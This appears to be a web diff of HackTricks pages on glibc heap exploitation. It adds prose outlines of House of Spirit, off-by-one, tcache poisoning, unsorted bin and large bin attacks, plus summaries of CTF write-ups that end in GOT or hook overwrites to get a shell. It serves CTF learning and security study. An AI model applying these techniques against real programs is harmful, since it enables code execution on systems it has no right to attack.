||||
|
|
|
@ -71,7 +71,7 @@ int main() {
|
|||
|
||||
### Goal
|
||||
|
||||
* Be able to add into the tcache / fast bin an address so later it's possible to alloc it
|
||||
* Be able to add into the tcache / fast bin an address so later it's possible to allocate it
|
||||
|
||||
### Requirements
|
||||
|
||||
|
@ -114,11 +114,15 @@ Note that it's necessary to create the second chunk in order to bypass some sani
|
|||
|
||||
## Examples
|
||||
|
||||
* CTF [https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html](https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html)
|
||||
* **CTF** [**https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html**](https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html)
|
||||
* **Libc infoleak**: Via an overflow it's possible to change a pointer to point to a GOT address in order to leak a libc address via the read action of the CTF
|
||||
* **House of Spirit**: Abusing a counter that counts the number of "rifles" it's possible to generate a fake size of the first fake chunk, then abusing a "message" it's possible to fake the second size of a chunk and finally abusing an overflow it's possible to change a pointer that is going to be freed so our first fake chunk is freed. Then, we can allocate it and inside of it there is going to be the address to where "message" is stored. Then, it's possible to make this point to the `scanf` entry inside the GOT table, so we can overwrite it with the address to system.\
|
||||
Next time `scanf` is called, we can send the input `"/bin/sh"` and get a shell.
|
||||
|
||||
* [**Gloater. HTB Cyber Apocalypse CTF 2024**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/gloater/)
|
||||
* **Glibc leak**: Uninitialized stack buffer.
|
||||
* **House of Spirit**: We can modify the first index of a global array of heap pointers. With a single byte modification, we use `free` on a fake chunk inside a valid chunk, so that we get an overlapping chunks situation after allocating again. With that, a simple Tcache poisoning attack works to get an arbitrary write primitive.
|
||||
|
||||
## References
|
||||
|
||||
* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit)
|
||||
|
|
|
@ -63,6 +63,13 @@ This could be used to **overwrite the `global_max_fast` global variable** of lib
|
|||
|
||||
You can find another great explanation of this attack in [**guyinatuxedo**](https://guyinatuxedo.github.io/32-largebin\_attack/largebin\_explanation0/index.html).
|
||||
|
||||
### Other examples
|
||||
|
||||
* [**La casa de papel. HackOn CTF 2024**](https://7rocky.github.io/en/ctf/other/hackon-ctf/la-casa-de-papel/)
|
||||
* Large bin attack in the same situation as it appears in [**how2heap**](https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/large\_bin\_attack.c).
|
||||
* The write primitive is more complex, because `global_max_fast` is useless here.
|
||||
* FSOP is needed to finish the exploit.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
|
|
@ -16,18 +16,19 @@ Other ways to support HackTricks:
|
|||
|
||||
## Basic Information
|
||||
|
||||
Having just access to a 1B overflow allows an attacker to modify the `pre_in_use` bit from the next chunk and as the current chunk won't be in use, the end of the chunk becomes the previous chunk size metadata information.\
|
||||
This allows to tamper which chunks are actually freed, potentially generating a chunk that contains another legit chunk.
|
||||
Having just access to a 1B overflow allows an attacker to modify the `size` field from the next chunk. This allows to tamper which chunks are actually freed, potentially generating a chunk that contains another legit chunk. The exploitation is similar to [double free](double-free.md) or overlapping chunks.
|
||||
|
||||
There are 2 types of off by one vulnerabilities:
|
||||
|
||||
* Arbitrary byte: This kind allows to overwrite that byte with any value
|
||||
* Null off by one: This kind allows to overwrite that byte only with 0x00
|
||||
* A common example of this vulnerability can be seen in the following code where the behavior of strlen and strcpy is inconsistent, which allows set a 0x00 byte in the beginning of the next chunk.
|
||||
* Null byte (off-by-null): This kind allows to overwrite that byte only with 0x00
|
||||
* A common example of this vulnerability can be seen in the following code where the behavior of `strlen` and `strcpy` is inconsistent, which allows set a 0x00 byte in the beginning of the next chunk.
|
||||
* This can be expoited with the [House of Einherjar](house-of-einherjar.md).
|
||||
* If using Tcache, this can be leveraged to a [double free](double-free.md) situation.
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Null off by one</summary>
|
||||
<summary>Off-by-null</summary>
|
||||
|
||||
```c
|
||||
// From https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/
|
||||
|
@ -50,7 +51,7 @@ int main(void)
|
|||
|
||||
Among other checks, now whenever a chunk is free the previous size is compared with the size configured in the metadata's chunk, making this attack fairly complex from version 2.28.
|
||||
|
||||
### Code Example:
|
||||
### Code example:
|
||||
|
||||
* [https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking\_free\_chunks.c](https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking\_free\_chunks.c)
|
||||
* This attack is no longer working due to the use of Tcaches.
|
||||
|
@ -62,12 +63,21 @@ Among other checks, now whenever a chunk is free the previous size is compared w
|
|||
|
||||
### Requirements
|
||||
|
||||
* Off by one overflow to modify the previous size metadata information
|
||||
* Off by one overflow to modify the size metadata information
|
||||
|
||||
### Attack
|
||||
### General off-by-one attack
|
||||
|
||||
* Allocate three chunks `A`, `B` and `C` (say sizes 0x20), and another one to prevent consolidation with the top-chunk.
|
||||
* Free `C` (inserted into 0x20 Tcache free-list).
|
||||
* Use chunk `A` to overflow on `B`. Abuse off-by-one to modify the `size` field of `B` from 0x21 to 0x41.
|
||||
* Now we have `B` containing the free chunk `C`
|
||||
* Free `B` and allocate a 0x40 chunk (it will be placed here again)
|
||||
* We can modify the `fd` pointer from `C`, which is still free (Tcache poisoning)
|
||||
|
||||
### Off-by-null attack
|
||||
|
||||
* 3 chunks of memory (a, b, c) are reserved one after the other. Then the middle one is freed. The first one contains an off by one overflow vulnerability and the attacker abuses it with a 0x00 (if the previous byte was 0x10 it would make he middle chunk indicate that it’s 0x10 smaller than it really is).
|
||||
* Then, 2 more smaller chunks are allocated in the middle freed chunk (b), however, as `b + b->size` never updates the c chunk because the pointed address is smaller than it should. 
|
||||
* Then, 2 more smaller chunks are allocated in the middle freed chunk (b), however, as `b + b->size` never updates the c chunk because the pointed address is smaller than it should.
|
||||
* Then, b1 and c gets freed. As `c - c->prev_size` still points to b (b1 now), both are consolidated in one chunk. However, b2 is still inside in between b1 and c.
|
||||
* Finally, a new malloc is performed reclaiming this memory area which is actually going to contain b2, allowing the owner of the new malloc to control the content of b2.
|
||||
|
||||
|
@ -78,6 +88,9 @@ This image explains perfectly the attack:
|
|||
## Other Examples & References
|
||||
|
||||
* [**https://heap-exploitation.dhavalkapil.com/attacks/shrinking\_free\_chunks**](https://heap-exploitation.dhavalkapil.com/attacks/shrinking\_free\_chunks)
|
||||
* [**Bon-nie-appetit. HTB Cyber Apocalypse CTF 2022**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/bon-nie-appetit/)
|
||||
* Off-by-one because of `strlen` considering the next chunk's `size` field.
|
||||
* Tcache is being used, so a general off-by-one attacks works to get an arbitrary write primitive with Tcache poisoning.
|
||||
* [**Asis CTF 2016 b00ks**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off\_by\_one/#1-asis-ctf-2016-b00ks)
|
||||
* It's possible to abuse an off by one to leak an address from the heap because the byte 0x00 of the end of a string being overwritten by the next field.
|
||||
* Arbitrary write is obtained by abusing the off by one write to make the pointer point to another place were a fake struct with fake pointers will be built. Then, it's possible to follow the pointer of this struct to obtain arbitrary write.
|
||||
|
|
|
@ -18,7 +18,7 @@ Several of the proposed heap exploitation techniques need to be able to overwrit
|
|||
|
||||
### Simple Use After Free
|
||||
|
||||
If it's possible for the attacker to **write info in a free chunk**, he could abuse this to overwrite the needed pointers.
|
||||
If it's possible for the attacker to **write info in a free chunk**, they could abuse this to overwrite the needed pointers.
|
||||
|
||||
### Double Free
|
||||
|
||||
|
@ -28,9 +28,9 @@ If the attacker can **`free` two times the same chunk** (free other chunks in be
|
|||
|
||||
It might be possible to **overflow an allocated chunk having next a freed chunk** and modify some headers/pointers of it.
|
||||
|
||||
### Off by 1 Overflow
|
||||
### Off-by-one overflow
|
||||
|
||||
In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore a heap overflow** (check previous section).
|
||||
In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section).
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -16,21 +16,21 @@ Other ways to support HackTricks:
|
|||
|
||||
## Basic Information
|
||||
|
||||
For more information about what is a tcache bin check this page:
|
||||
For more information about what is a Tcache bin check this page:
|
||||
|
||||
{% content-ref url="bins-and-memory-allocations.md" %}
|
||||
[bins-and-memory-allocations.md](bins-and-memory-allocations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
First of all, note that the Tcache was introduced in glibc version 2.26.
|
||||
First of all, note that the Tcache was introduced in Glibc version 2.26.
|
||||
|
||||
The **Tcache** attack proposed in the [**guyinatuxido page**](https://guyinatuxedo.github.io/29-tcache/tcache\_explanation/index.html) is very similar to the fast bin attack where the goal is to overwrite the pointer to the next chunk in the bin inside a freed chunk to an arbitrary address so later it's possible to **allocate that specific address and potentially overwrite pointes**.
|
||||
The **Tcache attack** (also known as **Tcache poisoning**) proposed in the [**guyinatuxido page**](https://guyinatuxedo.github.io/29-tcache/tcache\_explanation/index.html) is very similar to the fast bin attack where the goal is to overwrite the pointer to the next chunk in the bin inside a freed chunk to an arbitrary address so later it's possible to **allocate that specific address and potentially overwrite pointes**.
|
||||
|
||||
However, nowadays, if you run the mentioned code you will get the error: **`malloc(): unaligned tcache chunk detected`**. So, it's needed to write as address in the new pointer an aligned address (or execute enough times the binary so the written address is actually aligned).
|
||||
|
||||
### Tcache indexes attack
|
||||
|
||||
Usually it's possible to find at the beginning of the heap a chunk containing the **amount of chunks per index** inside the tcache and the address to the **head chunk of each tcache index**. If for some reason it's possible to modify this information, it would be possible to **make the head chunk of some index point to a desired address** (like malloc hook) to then allocated a chunk of the size of the index and overwrite the contents of malloc hook in this case.
|
||||
Usually it's possible to find at the beginning of the heap a chunk containing the **amount of chunks per index** inside the tcache and the address to the **head chunk of each tcache index**. If for some reason it's possible to modify this information, it would be possible to **make the head chunk of some index point to a desired address** (like `__malloc_hook`) to then allocated a chunk of the size of the index and overwrite the contents of `__malloc_hook` in this case.
|
||||
|
||||
## Examples
|
||||
|
||||
|
@ -50,6 +50,11 @@ Usually it's possible to find at the beginning of the heap a chunk containing th
|
|||
* CTF [https://guyinatuxedo.github.io/44-more\_tcache/csaw19\_popping\_caps1/index.html](https://guyinatuxedo.github.io/44-more\_tcache/csaw19\_popping\_caps1/index.html)
|
||||
* Same vulnerability as before with one extra restriction
|
||||
* **Tcache indexes attack**: Similar attack to the previous one but using less steps by **freeing the chunk that contains the tcache info** so it's address is added to the tcache index of its size so it's possible to allocate that size and get the tcache chunk info as a chunk, which allows to add free hook as the address of one index, alloc it, and write a one gadget on it.
|
||||
* [**Math Door. HTB Cyber Apocalypse CTF 2023**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/math-door/)
|
||||
* **Write After Free** to add a number to the `fd` pointer.
|
||||
* A lot of **heap feng-shui** is needed in this challenge. The writeup shows how **controlling the head of the Tcache** free-list is pretty handy.
|
||||
* **Glibc leak** through `stdout` (FSOP).
|
||||
* **Tcache poisoning** to get an arbitrary write primitive.
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -120,7 +120,7 @@ This attack allows to **change a pointer to a chunk to point 3 addresses before
|
|||
* When the second chunk is freed then this fake chunk is unlinked happening:
|
||||
* `fake_chunk->fd->bk` = `fake_chunk->bk`
|
||||
* `fake_chunk->bk->fd` = `fake_chunk->fd`
|
||||
* Previously it was made that `fake_chunk->fd->bk` and `fake_chunk->fd->bk` point to the same place (the location in the stack where `chunk1` was stored, so it was a valid linked list). As **both are pointing to the same location** only the last one (`fake_chunk->bk->fd = fake_chunk->fd`) will take **effect**.
|
||||
* Previously it was made that `fake_chunk->fd->bk` and `fake_chunk->bk->fd` point to the same place (the location in the stack where `chunk1` was stored, so it was a valid linked list). As **both are pointing to the same location** only the last one (`fake_chunk->bk->fd = fake_chunk->fd`) will take **effect**.
|
||||
* This will **overwrite the pointer to chunk1 in the stack to the address (or bytes) stored 3 addresses before in the stack**.
|
||||
* Therefore, if an attacker could control the content of the chunk1 again, he will be able to **write inside the stack** being able to potentially overwrite the return address skipping the canary and modify the values and points of local variables. Even modifying again the address of chunk1 stored in the stack to a different location where if the attacker could control again the content of chunk1 he will be able to write anywhere.
|
||||
* Note that this was possible because the **addresses are stored in the stack**. The risk and exploitation might depend on **where are the addresses to the fake chunk being stored**.
|
||||
|
|
|
@ -22,28 +22,28 @@ For more information about what is an unsorted bin check this page:
|
|||
[bins-and-memory-allocations.md](bins-and-memory-allocations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Unsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the bk pointer** in a chunk inside the unsorted bin, he could be able to **write that address in an arbitrary address** which could be helpful to leak a libc addresses or bypass some defense.
|
||||
Unsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the `bk` pointer** in a chunk inside the unsorted bin, he could be able to **write that address in an arbitrary address** which could be helpful to leak a Glibc addresses or bypass some defense.
|
||||
|
||||
So, basically, this attack allowed to **overwrite some arbitrary address with a big number** (an address which could be a heap address or a libc address) like some stack address that could be leak or some restriction like the global variable **`global_max_fast`** to allow to create fast bin bins with bigger sizes (and pass from an unsorted bin atack to a fast bin attack).
|
||||
So, basically, this attack allows to **set a big number at an arbitrary address**. This big number is an address, which could be a heap address or a Glibc address. A typical target is **`global_max_fast`** to allow to create fast bin bins with bigger sizes (and pass from an unsorted bin atack to a fast bin attack).
|
||||
|
||||
{% hint style="success" %}
|
||||
Taking a look to the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted\_bin\_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted\_bin\_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid tcaches) it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered.
|
||||
Taking a look to the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted\_bin\_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted\_bin\_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid Tcache) it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered.
|
||||
|
||||
Therefore, this unsorted bin attack now (among other checks) also requires to be able to fix the doubled linked list so this is bypassed `victim->bck->fd == victim` or not `victim->fd == av (arena)`. Which means that the address were we want to right must have the address of the fake chunk in its `fd` position and that the fake chunk `fd` is pointing to the arena.
|
||||
Therefore, this unsorted bin attack now (among other checks) also requires to be able to fix the doubled linked list so this is bypassed `victim->bk->fd == victim` or not `victim->fd == av (arena)`, which means that the address where we want to write must have the address of the fake chunk in its `fd` position and that the fake chunk `fd` is pointing to the arena.
|
||||
{% endhint %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **alloc the same size or the program will crash.**
|
||||
Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **allocate the same size or the program will crash.**
|
||||
|
||||
Note that making **`global_max_fast`** might help in this case trusting that the fast bin will be able to take care of all the other allocations until the exploit is completed.
|
||||
Note that overwriting **`global_max_fast`** might help in this case trusting that the fast bin will be able to take care of all the other allocations until the exploit is completed.
|
||||
{% endhint %}
|
||||
|
||||
The code from [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin\_attack/unsorted\_explanation/index.html) explains it very well, although if you modify the mallocs to allocate memory big enough so don't end in a tcache you can see that the previously mentioned error appears preventing this technique: **`malloc(): unsorted double linked list corrupted`**
|
||||
The code from [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin\_attack/unsorted\_explanation/index.html) explains it very well, although if you modify the mallocs to allocate memory big enough so don't end in a Tcache you can see that the previously mentioned error appears preventing this technique: **`malloc(): unsorted double linked list corrupted`**
|
||||
|
||||
## Unsorted Bin Infoleak Attack
|
||||
|
||||
This is actually a very basic concept. The chunks in the unsorted bin are going to be having pointers double pointers to create the bin. The first chunk in the unsorted bin will actually have the **FD** and the **BK** links **pointing to a part of the main arena (libc)**.\
|
||||
Therefore, if you can **put a chunk inside a unsorted bin and read it** (use after free) or **allocate it again without overwriting at least 1 of the pointers** to then **read** it, you can have a **libc info leak**.
|
||||
This is actually a very basic concept. The chunks in the unsorted bin are going to have pointers. The first chunk in the unsorted bin will actually have the **`fd`** and the **`bk`** links **pointing to a part of the main arena (Glibc)**.\
|
||||
Therefore, if you can **put a chunk inside a unsorted bin and read it** (use after free) or **allocate it again without overwriting at least 1 of the pointers** to then **read** it, you can have a **Glibc info leak**.
|
||||
|
||||
A similar [**attack used in this writeup**](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw18\_alienVSsamurai/index.html), was to abuse a 4 chunks structure (A, B, C and D - D is only to prevent consolidation with top chunk) so a null byte overflow in B was used to make C indicate that B was unused. Also, in B the `prev_size` data was modified so the size instead of being the size of B was A+B.\
|
||||
Then C was deallocated, and consolidated with A+B (but B was still in used). A new chunk of size A was allocated and then the libc leaked addresses was written into B from where they were leaked.
|
||||
|
@ -79,6 +79,10 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
|
|||
* And finally a chunk containing the string `/bin/sh\x00` is freed calling the delete function, triggering the **`__free_hook`** function which points to system with `/bin/sh\x00` as parameter.
|
||||
* **CTF** [**https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw19\_traveller/index.html**](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw19\_traveller/index.html)
|
||||
* Another example of abusing a 1B overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address
|
||||
* [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/)
|
||||
* We can only allocate chunks of size greater than `0x100`.
|
||||
* Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
|
||||
* Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
|
||||
|
||||
<details>
|
||||
|
||||
|
|
Loading…
Reference in a new issue